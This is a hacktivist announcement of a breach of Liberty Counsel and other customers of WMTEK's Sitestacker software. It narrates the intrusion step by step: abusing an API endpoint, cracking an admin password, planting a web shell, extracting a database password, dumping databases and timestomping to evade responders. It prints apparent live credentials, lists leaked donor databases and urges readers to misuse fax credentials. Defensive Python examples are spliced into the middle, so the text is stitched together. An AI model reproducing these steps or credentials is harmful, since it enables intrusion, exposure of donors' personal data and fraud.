"The Department of Justice today announced the revision of its policy regarding charging violations of the Computer Fraud and Abuse Act (CFAA). The policy for the first time directs that good-faith security research should not be charged. Good faith security research means accessing a computer solely for purposes of good-faith testing, investigation, and/or correction of a security flaw or vulnerability, where such activity is carried out in a manner designed to avoid any harm to individuals or the public, and where the information derived from the activity is used primarily to promote the security or safety of the class of devices, machines, or online services to which the accessed computer belongs, or those who use such devices, machines, or online services."

#Anonymous #OperationJane

--==[ Liberty Counsel ]==--

You first caught our attention with your litigation and lobbying against LGBTQ rights. In fact, we first hacked you a full month before we found out about your involvement in overturning Roe vs. Wade. And then we hacked you some more.

Noticing a worrying trend of far-right and anti-abortion activists aligning themselves with the evangelical Christian movement, hiding their funding sources behind laws that allow church ministries to keep their donations secret, we decided to bring about some much needed radical transparency by taking it upon ourselves to make your list of donors public.

--==[ WMTEK / Sitestacker ]==--

WMTEK is the developer of the Sitestacker CRM/CMS software used by Liberty Counsel and a number of evangelical missionary groups to manage their donations and operations. Much like Liberty Counsel, these missionary groups are able to hide their funding from the public behind church ministry secrecy laws. With the exploit we developed against Liberty Counsel, we were also able to hack all of WMTEK's other customers and bring radical transparency to the evangelical missionary movement.
--==[ The Exploit ]==--

We began our security assessment by creating an account on Liberty Counsel's website and going to the "My Giving" page. We noticed an interesting XHR request on that page to

    /p/Contributions/admin/Contributions/getAll.json?frontend=1&include_payment_method=1&person_or_affiliated_person_id=12345

Could it be that we could simply change the 'person_or_affiliated_person_id' parameter to view other people's donations?

    {"message":"You are not authorized to access that location."}

Nope! It's not going to be that easy. What else can the API tell us? How about changing "Contributions" to "Users"?

    "User": {
        "id": "75",
        "person_id": "1511",
        "username": "calin@wmtek.com",
        "password": "$2a$10$eb5q9e9VdicZeqBsYiKRr.P0H8p5u9jAbUGkvA5u2xxd1YwNElqOO",
        "saml_id": "calin@wmtek.com",
        "active": true,
        "verified": true,
        "created": "2015-12-23 08:27:00",
        "modified": "2019-11-14 10:21:42",
        "api_id": "rgvhhiej",
        "api_secret": "45a00b1fcde5434c002ba29be69db9e83d71f767",
        "force_saml": false
    }

We can get other users' profiles, including their bcrypt hashes. Hats off for using bcrypt; it's a secure password algorithm that takes a long time to crack. Let's try cracking the password for the admin support account of Calin from WMTEK anyway...

    calin@wmtek.com:Password1

Now able to use Calin's administrator account, we went into the /admin panel and noticed a File Manager feature that allows uploading any file to the website's webroot, including a simple PHP web shell! Using the web shell we can grab the MySQL password from the ../App/Config/database.php file:

        'Database/ExtendedMysql',
        'persistent' => false,
        'host' => 'localhost',
        'port' => '3306',
        'login' => 'webappuser',
        'password' => 'AmLT4ro6Qcgmppqn',
        'database' => 'webapp',
        'encoding' => 'utf8',
      );
    }

And run mysqldump to output a database backup into the webroot.
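The defect above is that the Contributions endpoint enforced ownership of 'person_or_affiliated_person_id' while the Users endpoint did not, and the Users response serialized password hashes and API secrets. The following is an added example, not Sitestacker or WMTEK code: it models both getAll.json endpoints with one centralized authorization check and a response allow-list; function names, field lists and the sample rows are assumptions.

```python
# Added example, not Sitestacker or WMTEK code: one ownership check shared by
# every per-person resource, so a new resource cannot ship without it, plus an
# allow-list so password hashes and API secrets are never serialized.
# Names, field lists and sample rows are constructed assumptions.
from dataclasses import dataclass
from functools import wraps

@dataclass
class Session:
    person_id: int
    is_admin: bool = False

class Forbidden(Exception):
    pass

def require_owner_or_admin(handler):
    """Never trust the person id from the query string on its own."""
    @wraps(handler)
    def wrapper(session, person_id):
        if not session.is_admin and person_id != session.person_id:
            raise Forbidden("You are not authorized to access that location.")
        return handler(session, person_id)
    return wrapper

# Constructed sample tables (placeholders, not values from the leak).
USERS = [
    {"id": "75", "person_id": 1511, "username": "support@example.test",
     "password": "$2a$10$PLACEHOLDER_BCRYPT_HASH", "api_id": "PLACEHOLDER",
     "api_secret": "PLACEHOLDER", "active": True},
    {"id": "76", "person_id": 1512, "username": "donor@example.test",
     "password": "$2a$10$PLACEHOLDER_BCRYPT_HASH", "api_id": "PLACEHOLDER",
     "api_secret": "PLACEHOLDER", "active": True},
]
CONTRIBUTIONS = [
    {"id": "1", "person_id": 1511, "amount": "25.00"},
    {"id": "2", "person_id": 1512, "amount": "100.00"},
]

# Only these User fields may ever reach a client, admin or not; credentials
# are compared server-side and never displayed.
USER_PUBLIC_FIELDS = ("id", "person_id", "username", "active")

@require_owner_or_admin
def users_get_all(session, person_id):
    rows = [u for u in USERS if u["person_id"] == person_id]
    return [{k: u[k] for k in USER_PUBLIC_FIELDS} for u in rows]

@require_owner_or_admin
def contributions_get_all(session, person_id):
    return [c for c in CONTRIBUTIONS if c["person_id"] == person_id]
```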
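The File Manager upload above leaves a PHP file in the webroot, and the next section mentions the shells were later timestomped. As an added example (not from the leak, Rackspace or Sophos), this is the check a responder can run: a script can backdate a file's mtime, but on Unix filesystems it cannot set ctime, so a webroot PHP file whose ctime is far newer than its mtime was backdated or modified after the fact. The gap threshold and the constructed sample webroot are assumptions.

```python
# Added example, not code from the leak, Rackspace or Sophos: flag files in a
# webroot whose ctime leads mtime, the trace a timestomp leaves on Unix.
# Threshold, suffixes and the sample webroot are constructed assumptions.
import os
import tempfile
import time
from pathlib import Path

def find_timestomped(webroot, min_gap_seconds=3600, suffixes=(".php",)):
    """Return webroot-relative paths of files whose ctime is at least
    min_gap_seconds newer than their mtime (sorted)."""
    hits = []
    for path in Path(webroot).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in suffixes:
            continue
        st = path.stat()
        if st.st_ctime - st.st_mtime >= min_gap_seconds:
            hits.append(path.relative_to(webroot).as_posix())
    return sorted(hits)

def build_sample_webroot():
    """Constructed sample: one untouched file and one backdated stand-in for
    an uploaded file (harmless content). Returns the temp directory."""
    root = tempfile.mkdtemp(prefix="webroot_")
    Path(root, "index.php").write_text("<?php echo 'index'; ?>\n")
    dropped = Path(root, "files", "uploads", "img.php")
    dropped.parent.mkdir(parents=True)
    dropped.write_text("<?php /* constructed placeholder, not a shell */ ?>\n")
    # Backdate atime and mtime the way a timestomp would; ctime stays 'now'.
    two_years_ago = time.time() - 2 * 365 * 86400
    os.utime(dropped, (two_years_ago, two_years_ago))
    return root

if __name__ == "__main__":
    print(find_timestomped(build_sample_webroot()))  # ['files/uploads/img.php']
```

On Windows st_ctime is the creation time rather than the inode change time, so the comparison only carries this meaning on Unix-like hosts.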
This went smoothly with Liberty Counsel, but while hacking the rest of WMTEK's customers on a Rackspace Managed server, we made the mistake of running `whoami` via the web shell, which alerted Rackspace's security team via the Sophos XDR they were running.

    rack     pts/2        iad.secure-acces Wed Jun  8 21:35    gone - no logout
    rack     pts/1        lon.secure-acces Wed Jun  8 21:28    gone - no logout
    rack     pts/0        ord.secure-acces Wed Jun  8 21:11    gone - no logout

With 3 security responders hunting for us, we switched from using mysqldump to Adminer for added stealth. We timestomped our web shells, and this proved too much for them to find, so they gave up and left us alone.

--==[ Contents ]==--

Databases:

    25p.sql.zst action.sql.zst adventures.sql.zst agus.sql.zst ai.sql.zst aim.sql.zst
    aimbak.sql.zst altlink.sql.zst amg.sql.zst apartmentlife.sql.zst ariseafrica.sql.zst
    arm.sql.zst avant.sql.zst barnabas.sql.zst bbfi.sql.zst bcp.sql.zst bhm.sql.zst
    bmw.sql.zst c4c.sql.zst cadence.sql.zst cadence_org.sql.zst caritas.sql.zst
    ccm.sql.zst chc.sql.zst childmaster.sql.zst childrenscup.sql.zst christar.sql.zst
    church.sql.zst cmr.sql.zst crf.sql.zst crossworld.sql.zst customize.sql.zst
    cvm.sql.zst djameskennedy.sql.zst donatecadence.sql.zst ecchurch.sql.zst ecm.sql.zst
    eli.sql.zst ethnos.sql.zst ewp.sql.zst familylegacy.sql.zst frontierventures.sql.zst
    gf.sql.zst goi.sql.zst gomsandbox.sql.zst gp.sql.zst gtn.sql.zst heartcry.sql.zst
    hopealiveafrica.sql.zst hot.sql.zst hth.sql.zst iacd.sql.zst ic.sql.zst icn.sql.zst
    ideas.sql.zst igl.sql.zst iphc.sql.zst iphc_sandbox.sql.zst itec.sql.zst kh.sql.zst
    lahash.sql.zst lc.sql.zst lc_updated_220708.sql.zst lifeline.sql.zst
    lifeline_bak.sql.zst lifeline_obfuscated.sql.zst lionheart.sql.zst lusandbox.sql.zst
    m_ptl.sql.zst maf.sql.zst mbsandbox.sql.zst mfi.sql.zst militarybeliever.sql.zst
    militarybeliever_restored.sql.zst militarymissionsnetwork.sql.zst missione4.sql.zst
    missiongo.sql.zst mq.sql.zst multiply.sql.zst mwc.sql.zst mysql.sql.zst
    nazarene.sql.zst ncboys.sql.zst newtraining.sql.zst nsp.sql.zst ntmcake26.sql.zst
    ntmusa.sql.zst oms.sql.zst opc.sql.zst rafiki.sql.zst rc.sql.zst reachbeyond.sql.zst
    reachbeyondtest.sql.zst remoteisland.sql.zst reports.sql.zst sammytippit.sql.zst
    sams.sql.zst send.sql.zst sitestacker1.sql.zst squareinchv2.sql.zst tb.sql.zst
    tc.sql.zst test.sql.zst testcc.sql.zst tmi.sql.zst treeoflife.sql.zst twr.sql.zst
    villagemission.sql.zst wgm.sql.zst wim.sql.zst wmtek.sql.zst wmtek_marketing.sql.zst
    wog.sql.zst ww.sql.zst

These contain the donor lists and all the information about their fundraising efforts.

Source code of Sitestacker:

    carlosesquivel/activities-funnel-report-demosite.bundle
    sitestacker/templates/Base.bundle
    sitestacker/templates/BaseChildOne.bundle
    sitestacker/templates/CIDI.bundle
    sitestacker/templates/CIDIsrael.bundle
    sitestacker/templates/CRF.bundle
    sitestacker/templates/Clean.bundle
    sitestacker/templates/Dashboards.bundle
    sitestacker/templates/LCBase.bundle
    sitestacker/templates/LibertyCounsel.bundle
    sitestacker/templates/LibertyCounselDashboards.bundle
    sitestacker/templates/LibertyResponsive.bundle
    sitestacker/templates/LifeUnited.bundle
    sitestacker/templates/Mobilize.bundle
    sitestacker/sitestacker.bundle
    themes/Contributions-LifeUnited.bundle

Use `git clone sitestacker/sitestacker.bundle` to check out the git repository.

Webroots:

    avant_webroot.txt.zst
    crossworld_webroot.txt.zst
    lc_org_webroot.txt.zst
    sitestacker_org_webroot.txt.zst
    vhosts.txt.zst

These are directory listings of the web roots of WMTEK customers. You can use these to archive all the publicly-available files they host. We did it for Liberty Counsel and packaged it as lc_webroot.tar.zst. We recommend transcribing all of the "Freedom's Call" podcast files with speech-to-text software to see if they reveal any more embarrassing information, like the time they admitted that they pray with the Supreme Court justices:
    https://www.rollingstone.com/politics/politics-features/roe-supreme-court-justices-1378046/

misc:

    MTW.org-210610.7z: Backup of Mission to the World/mtw.org website. They were the only ones running Sitestacker on Windows with SQL Server and we found it easier to simply make a copy of their own backup.

    lcFax.tar.zst: PHP script Liberty Counsel uses to fax their petitions to legislators. You can send your own faxes using the credentials included and have them pay for it.

    frc-old-sites.tar.zst: ColdFusion source code of the Family Research Council (frc.org) website.

Remember: King Kong died for YOUR sins!